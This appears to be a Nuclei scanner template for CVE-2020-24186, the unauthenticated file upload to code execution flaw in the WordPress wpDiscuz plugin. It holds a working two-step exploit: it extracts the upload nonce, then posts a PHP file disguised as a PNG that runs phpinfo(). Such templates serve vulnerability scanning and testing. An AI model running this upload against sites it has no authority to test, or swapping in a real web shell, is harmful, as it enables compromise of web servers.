id: CVE-2020-24186

info:
  name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
  author: Ganofins
  severity: critical
  description: WordPress wpDiscuz plugin versions  version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
  reference:
    - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
    - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
    - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2020-24186
    cwe-id: CWE-434
  tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive

requests:
  - raw:
      - |
        GET /?p=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="action"

        wmuUploadFiles
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_nonce"

        {{wmuSecurity}}
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmuAttachmentsData"

        undefined
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
        Content-Type: image/png

        {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
        <?php phpinfo();?>
        ------WebKitFormBoundary88AhjLimsDMHU1Ak
        Content-Disposition: form-data; name="postId"

        1
        ------WebKitFormBoundary88AhjLimsDMHU1Ak--

    extractors:
      - type: regex
        part: body
        internal: true
        name: wmuSecurity
        group: 1
        regex:
          - 'wmuSecurity":"([a-z0-9]+)'

      - type: regex
        part: body
        group: 1
        regex:
          - '"url":"([a-z:\\/0-9-.]+)"'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'success":true'
          - 'fullname'
          - 'shortname'
          - 'url'
        condition: and
        part: body

# Enhanced by mp on 2022/04/19